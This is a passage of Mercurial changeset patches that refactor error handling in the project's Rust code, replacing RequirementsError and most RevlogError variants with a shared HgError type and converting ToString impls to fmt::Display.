.to_py_object(py), ) } - Err(e) => Err(PyErr::new::<exc::ValueError, _>( - py, - match e { - DirstateParseError::TooLittleData => { - "too little data for parents".to_string() - } - DirstateParseError::Overflow => { - "overflow in dirstate".to_string() - } - DirstateParseError::CorruptedEntry(e) => e, - DirstateParseError::Damaged => { - "dirstate appears to be damaged".to_string() - } - }, - )), + Err(e) => Err(PyErr::new::<exc::ValueError, _>(py, e.to_string())), } } diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -2,7 +2,8 @@ use crate::ui::utf8_to_local; use crate::ui::UiError; use format_bytes::format_bytes; -use hg::operations::{FindRootError, ListDirstateTrackedFilesError}; +use hg::errors::HgError; +use hg::operations::FindRootError; use hg::requirements::RequirementsError; use hg::revlog::revlog::RevlogError; use hg::utils::files::get_bytes_from_path; @@ -27,6 +28,9 @@ Abort(Option<Vec<u8>>), /// A mercurial capability as not been implemented. 
Unimplemented, + /// Common cases + #[from] + Other(HgError), } impl CommandError { @@ -42,6 +46,10 @@ CommandError::StderrError => exitcode::ABORT, CommandError::Abort(_) => exitcode::ABORT, CommandError::Unimplemented => exitcode::UNIMPLEMENTED_COMMAND, + CommandError::Other(HgError::UnsupportedFeature(_)) => { + exitcode::UNIMPLEMENTED_COMMAND + } + CommandError::Other(_) => exitcode::ABORT, } } @@ -141,21 +149,3 @@ } } } - -impl From<ListDirstateTrackedFilesError> for CommandError { - fn from(err: ListDirstateTrackedFilesError) -> Self { - match err { - ListDirstateTrackedFilesError::IoError(err) => { - CommandError::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )) - } - ListDirstateTrackedFilesError::ParseError(_) => { - CommandError::Abort(Some( - // TODO find a better error message - b"abort: parse error\n".to_vec(), - )) - } - } - } -} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611756291 -3600 # Wed Jan 27 15:04:51 2021 +0100 # Node ID 741e36f472a5022ce807b2f063098b3c86e23f54 # Parent 776b97179c0617424b71c039de1ce6eb4b7daab2 rhg: Print an error message in more cases Differential Revision: https://phab.mercurial-scm.org/D9895 diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -73,7 +73,16 @@ ) } CommandError::Abort(message) => message.to_owned(), - _ => None, + + CommandError::RequirementsError(_) + | CommandError::StdoutError + | CommandError::StderrError + | CommandError::Unimplemented + | CommandError::Other(HgError::UnsupportedFeature(_)) => None, + + CommandError::Other(e) => { + Some(format_bytes!(b"{}\n", e.to_string().as_bytes())) + } } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611755949 -3600 # Wed Jan 27 14:59:09 2021 +0100 # Node ID 02d3bb972121437c19b53a83cc9360bb3f2b725f # Parent 741e36f472a5022ce807b2f063098b3c86e23f54 rust: replace RequirementsError with HgError Differential Revision: 
https://phab.mercurial-scm.org/D9896 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,3 +1,4 @@ +use crate::errors::HgError; use crate::operations::{find_root, FindRootError}; use crate::requirements; use memmap::{Mmap, MmapOptions}; @@ -33,9 +34,7 @@ find_root().map(Self::for_path) } - pub fn check_requirements( - &self, - ) -> Result<(), requirements::RequirementsError> { + pub fn check_requirements(&self) -> Result<(), HgError> { requirements::check(self) } diff --git a/rust/hg-core/src/requirements.rs b/rust/hg-core/src/requirements.rs --- a/rust/hg-core/src/requirements.rs +++ b/rust/hg-core/src/requirements.rs @@ -1,19 +1,7 @@ +use crate::errors::{HgError, HgResultExt, IoResultExt}; use crate::repo::Repo; -use std::io; -#[derive(Debug)] -pub enum RequirementsError { - // TODO: include a path? - Io(io::Error), - /// The `requires` file is corrupted - Corrupted, - /// The repository requires a feature that we don't support - Unsupported { - feature: String, - }, -} - -fn parse(bytes: &[u8]) -> Result<Vec<String>, ()> { +fn parse(bytes: &[u8]) -> Result<Vec<String>, HgError> { // The Python code reading this file uses `str.splitlines` // which looks for a number of line separators (even including a couple of // non-ASCII ones), but Python code writing it always uses `\n`. @@ -27,16 +15,21 @@ if line[0].is_ascii_alphanumeric() && line.is_ascii() { Ok(String::from_utf8(line.into()).unwrap()) } else { - Err(()) + Err(HgError::corrupted("parse error in 'requires' file")) } }) .collect() } -pub fn load(repo: &Repo) -> Result<Vec<String>, RequirementsError> { - match repo.hg_vfs().read("requires") { - Ok(bytes) => parse(&bytes).map_err(|()| RequirementsError::Corrupted), - +pub fn load(repo: &Repo) -> Result<Vec<String>, HgError> { + if let Some(bytes) = repo + .hg_vfs() + .read("requires") + .for_file("requires".as_ref()) + .io_not_found_as_none()? 
+ { + parse(&bytes) + } else { // Treat a missing file the same as an empty file. // From `mercurial/localrepo.py`: // > requires file contains a newline-delimited list of @@ -44,18 +37,19 @@ // > the repository. This file was introduced in Mercurial 0.9.2, // > which means very old repositories may not have one. We assume // > a missing file translates to no requirements. - Err(error) if error.kind() == std::io::ErrorKind::NotFound => { - Ok(Vec::new()) - } - - Err(error) => Err(RequirementsError::Io(error))?, + Ok(Vec::new()) } } -pub fn check(repo: &Repo) -> Result<(), RequirementsError> { +pub fn check(repo: &Repo) -> Result<(), HgError> { for feature in load(repo)? { if !SUPPORTED.contains(&&*feature) { - return Err(RequirementsError::Unsupported { feature }); + // TODO: collect and all unknown features and include them in the + // error message? + return Err(HgError::UnsupportedFeature(format!( + "repository requires feature unknown to this Mercurial: {}", + feature + ))); } } Ok(()) diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -4,7 +4,6 @@ use format_bytes::format_bytes; use hg::errors::HgError; use hg::operations::FindRootError; -use hg::requirements::RequirementsError; use hg::revlog::revlog::RevlogError; use hg::utils::files::get_bytes_from_path; use std::convert::From; @@ -17,9 +16,6 @@ RootNotFound(PathBuf), /// The current directory cannot be found CurrentDirNotFound(std::io::Error), - /// `.hg/requires` - #[from] - RequirementsError(RequirementsError), /// The standard output stream cannot be written to StdoutError, /// The standard error stream cannot be written to @@ -38,10 +34,6 @@ match self { CommandError::RootNotFound(_) => exitcode::ABORT, CommandError::CurrentDirNotFound(_) => exitcode::ABORT, - CommandError::RequirementsError( - RequirementsError::Unsupported { .. 
}, - ) => exitcode::UNIMPLEMENTED_COMMAND, - CommandError::RequirementsError(_) => exitcode::ABORT, CommandError::StdoutError => exitcode::ABORT, CommandError::StderrError => exitcode::ABORT, CommandError::Abort(_) => exitcode::ABORT, @@ -67,15 +59,9 @@ b"abort: error getting current working directory: {}\n", e.to_string().as_bytes(), )), - CommandError::RequirementsError(RequirementsError::Corrupted) => { - Some( - "abort: .hg/requires is corrupted\n".as_bytes().to_owned(), - ) - } CommandError::Abort(message) => message.to_owned(), - CommandError::RequirementsError(_) - | CommandError::StdoutError + CommandError::StdoutError | CommandError::StderrError | CommandError::Unimplemented | CommandError::Other(HgError::UnsupportedFeature(_)) => None, diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -163,7 +163,7 @@ $ echo -e '\xFF' >> .hg/requires $ rhg debugrequirements - abort: .hg/requires is corrupted + corrupted repository: parse error in 'requires' file [255] Persistent nodemap # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611755125 -3600 # Wed Jan 27 14:45:25 2021 +0100 # Node ID 43d63979a75e860069382a100a74f47f7647d87a # Parent 02d3bb972121437c19b53a83cc9360bb3f2b725f rust: use HgError in RevlogError and Vfs Differential Revision: https://phab.mercurial-scm.org/D9897 diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -35,6 +35,9 @@ impl HgError { pub fn corrupted(explanation: impl Into<String>) -> Self { + // TODO: capture a backtrace here and keep it in the error value + // to aid debugging? 
+ // https://doc.rust-lang.org/std/backtrace/struct.Backtrace.html HgError::CorruptedRepository(explanation.into()) } } diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -3,6 +3,7 @@ // // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. + mod ancestors; pub mod dagops; pub mod errors; diff --git a/rust/hg-core/src/operations/cat.rs b/rust/hg-core/src/operations/cat.rs --- a/rust/hg-core/src/operations/cat.rs +++ b/rust/hg-core/src/operations/cat.rs @@ -33,8 +33,8 @@ let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; let changelog_entry = changelog.get_rev(rev)?; - let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) - .map_err(|_| RevlogError::Corrupted)?; + let manifest_node = + Node::from_hex_for_repo(&changelog_entry.manifest_node()?)?; let manifest_entry = manifest.get_node(manifest_node.into())?; let mut bytes = vec![]; @@ -46,8 +46,7 @@ let file_log = Revlog::open(repo, &index_path, Some(&data_path))?; - let file_node = Node::from_hex(node_bytes) - .map_err(|_| RevlogError::Corrupted)?; + let file_node = Node::from_hex_for_repo(node_bytes)?; let file_rev = file_log.get_node_rev(file_node.into())?; let data = file_log.get_rev_data(file_rev)?; if data.starts_with(&METADATA_DELIMITER) { diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -6,7 +6,7 @@ // GNU General Public License version 2 or any later version. 
use crate::dirstate::parsers::parse_dirstate; -use crate::errors::{HgError, IoResultExt}; +use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::changelog::Changelog; use crate::revlog::manifest::{Manifest, ManifestEntry}; @@ -25,12 +25,7 @@ impl Dirstate { pub fn new(repo: &Repo) -> Result<Self, HgError> { - let content = repo - .hg_vfs() - .read("dirstate") - // TODO: this will be more accurate when we use `HgError` in - // `Vfs::read`. - .for_file("dirstate".as_ref())?; + let content = repo.hg_vfs().read("dirstate")?; Ok(Self { content }) } @@ -57,8 +52,8 @@ let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; let changelog_entry = changelog.get_rev(rev)?; - let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) - .map_err(|_| RevlogError::Corrupted)?; + let manifest_node = + Node::from_hex_for_repo(&changelog_entry.manifest_node()?)?; let manifest_entry = manifest.get_node(manifest_node.into())?; Ok(FilesForRev(manifest_entry)) } diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,4 +1,4 @@ -use crate::errors::HgError; +use crate::errors::{HgError, IoResultExt}; use crate::operations::{find_root, FindRootError}; use crate::requirements; use memmap::{Mmap, MmapOptions}; @@ -68,24 +68,19 @@ pub(crate) fn read( &self, relative_path: impl AsRef<Path>, - ) -> std::io::Result<Vec<u8>> { - std::fs::read(self.base.join(relative_path)) - } - - pub(crate) fn open( - &self, - relative_path: impl AsRef<Path>, - ) -> std::io::Result<std::fs::File> { - std::fs::File::open(self.base.join(relative_path)) + ) -> Result<Vec<u8>, HgError> { + let path = self.base.join(relative_path); + std::fs::read(&path).for_file(&path) } pub(crate) fn mmap_open( &self, relative_path: impl AsRef<Path>, - ) -> std::io::Result<Mmap> { - let file = self.open(relative_path)?; + ) -> Result<Mmap, HgError> { + let path = self.base.join(relative_path); + let file = 
std::fs::File::open(&path).for_file(&path)?; // TODO: what are the safety requirements here? - let mmap = unsafe { MmapOptions::new().map(&file) }?; + let mmap = unsafe { MmapOptions::new().map(&file) }.for_file(&path)?; Ok(mmap) } } diff --git a/rust/hg-core/src/requirements.rs b/rust/hg-core/src/requirements.rs --- a/rust/hg-core/src/requirements.rs +++ b/rust/hg-core/src/requirements.rs @@ -1,4 +1,4 @@ -use crate::errors::{HgError, HgResultExt, IoResultExt}; +use crate::errors::{HgError, HgResultExt}; use crate::repo::Repo; fn parse(bytes: &[u8]) -> Result<Vec<String>, HgError> { @@ -22,11 +22,8 @@ } pub fn load(repo: &Repo) -> Result<Vec<String>, HgError> { - if let Some(bytes) = repo - .hg_vfs() - .read("requires") - .for_file("requires".as_ref()) - .io_not_found_as_none()? + if let Some(bytes) = + repo.hg_vfs().read("requires").io_not_found_as_none()? { parse(&bytes) } else { diff --git a/rust/hg-core/src/revlog/changelog.rs b/rust/hg-core/src/revlog/changelog.rs --- a/rust/hg-core/src/revlog/changelog.rs +++ b/rust/hg-core/src/revlog/changelog.rs @@ -1,3 +1,4 @@ +use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; use crate::revlog::NodePrefix; @@ -53,6 +54,8 @@ /// Return the node id of the `manifest` referenced by this `changelog` /// entry. 
pub fn manifest_node(&self) -> Result<&[u8], RevlogError> { - self.lines().next().ok_or(RevlogError::Corrupted) + self.lines() + .next() + .ok_or_else(|| HgError::corrupted("empty changelog entry").into()) } } diff --git a/rust/hg-core/src/revlog/index.rs b/rust/hg-core/src/revlog/index.rs --- a/rust/hg-core/src/revlog/index.rs +++ b/rust/hg-core/src/revlog/index.rs @@ -3,6 +3,7 @@ use byteorder::{BigEndian, ByteOrder}; +use crate::errors::HgError; use crate::revlog::node::Node; use crate::revlog::revlog::RevlogError; use crate::revlog::{Revision, NULL_REVISION}; @@ -44,7 +45,8 @@ offsets: Some(offsets), }) } else { - Err(RevlogError::Corrupted) + Err(HgError::corrupted("unexpected inline revlog length") + .into()) } } else { Ok(Self { diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -8,6 +8,7 @@ //! In Mercurial code base, it is customary to call "a node" the binary SHA //! of a revision. +use crate::errors::HgError; use bytes_cast::BytesCast; use std::convert::{TryFrom, TryInto}; use std::fmt; @@ -136,6 +137,19 @@ } } + /// `from_hex`, but for input from an internal file of the repository such + /// as a changelog or manifest entry. + /// + /// An error is treated as repository corruption. 
+ pub fn from_hex_for_repo(hex: impl AsRef<[u8]>) -> Result<Node, HgError> { + Self::from_hex(hex.as_ref()).map_err(|FromHexError| { + HgError::CorruptedRepository(format!( + "Expected a full hexadecimal node ID, found {}", + String::from_utf8_lossy(hex.as_ref()) + )) + }) + } + /// Provide access to binary data /// /// This is needed by FFI layers, for instance to return expected diff --git a/rust/hg-core/src/revlog/nodemap_docket.rs b/rust/hg-core/src/revlog/nodemap_docket.rs --- a/rust/hg-core/src/revlog/nodemap_docket.rs +++ b/rust/hg-core/src/revlog/nodemap_docket.rs @@ -1,3 +1,4 @@ +use crate::errors::{HgError, HgResultExt}; use bytes_cast::{unaligned, BytesCast}; use memmap::Mmap; use std::path::{Path, PathBuf}; @@ -38,12 +39,12 @@ index_path: &Path, ) -> Result<Option<(Self, Mmap)>, RevlogError> { let docket_path = index_path.with_extension("n"); - let docket_bytes = match repo.store_vfs().read(&docket_path) { - Err(e) if e.kind() == std::io::ErrorKind::NotFound => { - return Ok(None) - } - Err(e) => return Err(RevlogError::IoError(e)), - Ok(bytes) => bytes, + let docket_bytes = if let Some(bytes) = + repo.store_vfs().read(&docket_path).io_not_found_as_none()? + { + bytes + } else { + return Ok(None); }; let input = if let Some((&ONDISK_VERSION, rest)) = @@ -54,36 +55,40 @@ return Ok(None); }; - let (header, rest) = DocketHeader::from_bytes(input)?; + /// Treat any error as a parse error + fn parse<T, E>(result: Result<T, E>) -> Result<T, RevlogError> { + result.map_err(|_| { + HgError::corrupted("nodemap docket parse error").into() + }) + } + + let (header, rest) = parse(DocketHeader::from_bytes(input))?; let uid_size = header.uid_size as usize; // TODO: do we care about overflow for 4 GB+ nodemap files on 32-bit // systems? 
let tip_node_size = header.tip_node_size.get() as usize; let data_length = header.data_length.get() as usize; - let (uid, rest) = u8::slice_from_bytes(rest, uid_size)?; - let (_tip_node, _rest) = u8::slice_from_bytes(rest, tip_node_size)?; - let uid = - std::str::from_utf8(uid).map_err(|_| RevlogError::Corrupted)?; + let (uid, rest) = parse(u8::slice_from_bytes(rest, uid_size))?; + let (_tip_node, _rest) = + parse(u8::slice_from_bytes(rest, tip_node_size))?; + let uid = parse(std::str::from_utf8(uid))?; let docket = NodeMapDocket { data_length }; let data_path = rawdata_path(&docket_path, uid); - // TODO: use `std::fs::read` here when the `persistent-nodemap.mmap` + // TODO: use `vfs.read()` here when the `persistent-nodemap.mmap` // config is false? - match repo.store_vfs().mmap_open(&data_path) { - Ok(mmap) => { - if mmap.len() >= data_length { - Ok(Some((docket, mmap))) - } else { - Err(RevlogError::Corrupted) - } + if let Some(mmap) = repo + .store_vfs() + .mmap_open(&data_path) + .io_not_found_as_none()? 
+ { + if mmap.len() >= data_length { + Ok(Some((docket, mmap))) + } else { + Err(HgError::corrupted("persistent nodemap too short").into()) } - Err(error) => { - if error.kind() == std::io::ErrorKind::NotFound { - Ok(None) - } else { - Err(RevlogError::IoError(error)) - } - } + } else { + Ok(None) } } } diff --git a/rust/hg-core/src/revlog/revlog.rs b/rust/hg-core/src/revlog/revlog.rs --- a/rust/hg-core/src/revlog/revlog.rs +++ b/rust/hg-core/src/revlog/revlog.rs @@ -13,25 +13,34 @@ use super::index::Index; use super::node::{NodePrefix, NODE_BYTES_LENGTH, NULL_NODE}; use super::nodemap; -use super::nodemap::NodeMap; +use super::nodemap::{NodeMap, NodeMapError}; use super::nodemap_docket::NodeMapDocket; use super::patch; +use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::Revision; +#[derive(derive_more::From)] pub enum RevlogError { - IoError(std::io::Error), - UnsuportedVersion(u16), InvalidRevision, /// Found more than one entry whose ID match the requested prefix AmbiguousPrefix, - Corrupted, - UnknowDataFormat(u8), + #[from] + Other(HgError), } -impl From<bytes_cast::FromBytesError> for RevlogError { - fn from(_: bytes_cast::FromBytesError) -> Self { - RevlogError::Corrupted +impl From<NodeMapError> for RevlogError { + fn from(error: NodeMapError) -> Self { + match error { + NodeMapError::MultipleResults => RevlogError::AmbiguousPrefix, + NodeMapError::RevisionNotInIndex(_) => RevlogError::corrupted(), + } + } +} + +impl RevlogError { + fn corrupted() -> Self { + RevlogError::Other(HgError::corrupted("corrupted revlog")) } } @@ -59,14 +68,12 @@ data_path: Option<&Path>, ) -> Result<Self, RevlogError> { let index_path = index_path.as_ref(); - let index_mmap = repo - .store_vfs() - .mmap_open(&index_path) - .map_err(RevlogError::IoError)?; + let index_mmap = repo.store_vfs().mmap_open(&index_path)?; let version = get_version(&index_mmap); if version != 1 { - return Err(RevlogError::UnsuportedVersion(version)); + // A proper new version should 
have had a repo/store requirement. + return Err(RevlogError::corrupted()); } let index = Index::new(Box::new(index_mmap))?; @@ -80,10 +87,7 @@ None } else { let data_path = data_path.unwrap_or(&default_data_path); - let data_mmap = repo - .store_vfs() - .mmap_open(data_path) - .map_err(RevlogError::IoError)?; + let data_mmap = repo.store_vfs().mmap_open(data_path)?; Some(Box::new(data_mmap)) }; @@ -121,9 +125,7 @@ ) -> Result<Revision, RevlogError> { if let Some(nodemap) = &self.nodemap { return nodemap - .find_bin(&self.index, node) - // TODO: propagate details of this error: - .map_err(|_| RevlogError::Corrupted)? + .find_bin(&self.index, node)? .ok_or(RevlogError::InvalidRevision); } @@ -136,7 +138,9 @@ let mut found_by_prefix = None; for rev in (0..self.len() as Revision).rev() { let index_entry = - self.index.get_entry(rev).ok_or(RevlogError::Corrupted)?; + self.index.get_entry(rev).ok_or(HgError::corrupted( + "revlog references a revision not in the index", + ))?; if node == *index_entry.hash() { return Ok(rev); } @@ -167,8 +171,9 @@ let mut delta_chain = vec![]; while let Some(base_rev) = entry.base_rev { delta_chain.push(entry); - entry = - self.get_entry(base_rev).or(Err(RevlogError::Corrupted))?; + entry = self + .get_entry(base_rev) + .map_err(|_| RevlogError::corrupted())?; } // TODO do not look twice in the index @@ -191,7 +196,7 @@ ) { Ok(data) } else { - Err(RevlogError::Corrupted) + Err(RevlogError::corrupted()) } } @@ -301,7 +306,8 @@ b'x' => Ok(Cow::Owned(self.uncompressed_zlib_data()?)), // zstd data. b'\x28' => Ok(Cow::Owned(self.uncompressed_zstd_data()?)), - format_type => Err(RevlogError::UnknowDataFormat(format_type)), + // A proper new format should have had a repo/store requirement. 
+ _format_type => Err(RevlogError::corrupted()), } } @@ -311,13 +317,13 @@ let mut buf = Vec::with_capacity(self.compressed_len); decoder .read_to_end(&mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; Ok(buf) } else { let mut buf = vec![0; self.uncompressed_len]; decoder .read_exact(&mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; Ok(buf) } } @@ -326,14 +332,14 @@ if self.is_delta() { let mut buf = Vec::with_capacity(self.compressed_len); zstd::stream::copy_decode(self.bytes, &mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; Ok(buf) } else { let mut buf = vec![0; self.uncompressed_len]; let len = zstd::block::decompress_to_buffer(self.bytes, &mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; if len != self.uncompressed_len { - Err(RevlogError::Corrupted) + Err(RevlogError::corrupted()) } else { Ok(buf) } diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -103,9 +103,6 @@ impl From<(RevlogError, &str)> for CommandError { fn from((err, rev): (RevlogError, &str)) -> CommandError { match err { - RevlogError::IoError(err) => CommandError::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), RevlogError::InvalidRevision => CommandError::Abort(Some( utf8_to_local(&format!( "abort: invalid revision identifier {}\n", @@ -120,27 +117,7 @@ )) .into(), )), - RevlogError::UnsuportedVersion(version) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) - } - RevlogError::Corrupted => { - CommandError::Abort(Some("abort: corrupted revlog\n".into())) - } - RevlogError::UnknowDataFormat(format) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } + RevlogError::Other(err) => 
CommandError::Other(err), } } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611858117 -3600 # Thu Jan 28 19:21:57 2021 +0100 # Node ID 6c778d20c8c20620b3c6e4a9da99b5088f90fe58 # Parent 43d63979a75e860069382a100a74f47f7647d87a rust: replace ToString impls with Display ToString is automatically implemented for everything that implements Display, and Display can avoid allocating intermediate strings. Differential Revision: https://phab.mercurial-scm.org/D9904 diff --git a/rust/hg-core/src/dirstate/status.rs b/rust/hg-core/src/dirstate/status.rs --- a/rust/hg-core/src/dirstate/status.rs +++ b/rust/hg-core/src/dirstate/status.rs @@ -33,6 +33,7 @@ use std::{ borrow::Cow, collections::HashSet, + fmt, fs::{read_dir, DirEntry}, io::ErrorKind, ops::Deref, @@ -51,17 +52,16 @@ Unknown, } -impl ToString for BadType { - fn to_string(&self) -> String { - match self { +impl fmt::Display for BadType { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + f.write_str(match self { BadType::CharacterDevice => "character device", BadType::BlockDevice => "block device", BadType::FIFO => "fifo", BadType::Socket => "socket", BadType::Directory => "directory", BadType::Unknown => "unknown", - } - .to_string() + }) } } @@ -277,12 +277,12 @@ pub type StatusResult<T> = Result<T, StatusError>; -impl ToString for StatusError { - fn to_string(&self) -> String { +impl fmt::Display for StatusError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { - StatusError::IO(e) => e.to_string(), - StatusError::Path(e) => e.to_string(), - StatusError::Pattern(e) => e.to_string(), + StatusError::IO(error) => error.fmt(f), + StatusError::Path(error) => error.fmt(f), + StatusError::Pattern(error) => error.fmt(f), } } } diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -39,6 +39,7 @@ PatternFileWarning, PatternSyntax, }; use std::collections::HashMap; +use std::fmt; use 
twox_hash::RandomXxHashBuilder64; /// This is a contract between the `micro-timer` crate and us, to expose @@ -59,14 +60,16 @@ InvalidPath(HgPathError), } -impl ToString for DirstateMapError { - fn to_string(&self) -> String { +impl fmt::Display for DirstateMapError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { DirstateMapError::PathNotFound(_) => { - "expected a value, found none".to_string() + f.write_str("expected a value, found none") } - DirstateMapError::EmptyPath => "Overflow in dirstate.".to_string(), - DirstateMapError::InvalidPath(e) => e.to_string(), + DirstateMapError::EmptyPath => { + f.write_str("Overflow in dirstate.") + } + DirstateMapError::InvalidPath(path_error) => path_error.fmt(f), } } } @@ -91,25 +94,26 @@ NonRegexPattern(IgnorePattern), } -impl ToString for PatternError { - fn to_string(&self) -> String { +impl fmt::Display for PatternError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { PatternError::UnsupportedSyntax(syntax) => { - format!("Unsupported syntax {}", syntax) + write!(f, "Unsupported syntax {}", syntax) } PatternError::UnsupportedSyntaxInFile(syntax, file_path, line) => { - format!( + write!( + f, "{}:{}: unsupported syntax {}", file_path, line, syntax ) } PatternError::TooLong(size) => { - format!("matcher pattern is too long ({} bytes)", size) + write!(f, "matcher pattern is too long ({} bytes)", size) } - PatternError::IO(e) => e.to_string(), - PatternError::Path(e) => e.to_string(), + PatternError::IO(error) => error.fmt(f), + PatternError::Path(error) => error.fmt(f), PatternError::NonRegexPattern(pattern) => { - format!("'{:?}' cannot be turned into a regex", pattern) + write!(f, "'{:?}' cannot be turned into a regex", pattern) } } } diff --git a/rust/hg-core/src/utils/hg_path.rs b/rust/hg-core/src/utils/hg_path.rs --- a/rust/hg-core/src/utils/hg_path.rs +++ b/rust/hg-core/src/utils/hg_path.rs @@ -47,57 +47,68 @@ }, } -impl ToString for HgPathError { - fn to_string(&self) 
-> String { +impl fmt::Display for HgPathError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { HgPathError::LeadingSlash(bytes) => { - format!("Invalid HgPath '{:?}': has a leading slash.", bytes) + write!(f, "Invalid HgPath '{:?}': has a leading slash.", bytes) } HgPathError::ConsecutiveSlashes { bytes, second_slash_index: pos, - } => format!( + } => write!( + f, "Invalid HgPath '{:?}': consecutive slashes at pos {}.", bytes, pos ), HgPathError::ContainsNullByte { bytes, null_byte_index: pos, - } => format!( + } => write!( + f, "Invalid HgPath '{:?}': contains null byte at pos {}.", bytes, pos ), - HgPathError::DecodeError(bytes) => { - format!("Invalid HgPath '{:?}': could not be decoded.", bytes) - } + HgPathError::DecodeError(bytes) => write!( + f, + "Invalid HgPath '{:?}': could not be decoded.", + bytes + ), HgPathError::EndsWithSlash(path) => { - format!("Audit failed for '{}': ends with a slash.", path) + write!(f, "Audit failed for '{}': ends with a slash.", path) } - HgPathError::ContainsIllegalComponent(path) => format!( + HgPathError::ContainsIllegalComponent(path) => write!( + f, "Audit failed for '{}': contains an illegal component.", path ), - HgPathError::InsideDotHg(path) => format!( + HgPathError::InsideDotHg(path) => write!( + f, "Audit failed for '{}': is inside the '.hg' folder.", path ), HgPathError::IsInsideNestedRepo { path, nested_repo: nested, - } => format!( + } => { + write!(f, "Audit failed for '{}': is inside a nested repository '{}'.", path, nested - ), - HgPathError::TraversesSymbolicLink { path, symlink } => format!( + ) + } + HgPathError::TraversesSymbolicLink { path, symlink } => write!( + f, "Audit failed for '{}': traverses symbolic link '{}'.", path, symlink ), - HgPathError::NotFsCompliant(path) => format!( + HgPathError::NotFsCompliant(path) => write!( + f, "Audit failed for '{}': cannot be turned into a \ filesystem path.", path ), - HgPathError::NotUnderRoot { path, root } => format!( + 
HgPathError::NotUnderRoot { path, root } => write!( + f, "Audit failed for '{}': not under root {}.", path.display(), root.display() # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611857635 -3600 # Thu Jan 28 19:13:55 2021 +0100 # Node ID ca3f73cc3cf4269ae519878628cba51a70065fa5 # Parent 6c778d20c8c20620b3c6e4a9da99b5088f90fe58 rhg: Simplify CommandError based on its use Differential Revision: https://phab.mercurial-scm.org/D9905 diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -7,6 +7,7 @@ //! Contains useful functions, traits, structs, etc. for use in core. +use crate::errors::{HgError, IoErrorContext}; use crate::utils::hg_path::HgPath; use std::{io::Write, ops::Deref}; @@ -176,3 +177,10 @@ None } } + +pub fn current_dir() -> Result<std::path::PathBuf, HgError> { + std::env::current_dir().map_err(|error| HgError::IoError { + error, + context: IoErrorContext::CurrentDir, + }) +} diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -32,17 +32,18 @@ fn run(&self, ui: &Ui) -> Result<(), CommandError> { let repo = Repo::find()?; repo.check_requirements()?; - let cwd = std::env::current_dir() - .or_else(|e| Err(CommandError::CurrentDirNotFound(e)))?; + let cwd = hg::utils::current_dir()?; let mut files = vec![]; for file in self.files.iter() { + // TODO: actually normalize `..` path segments etc? 
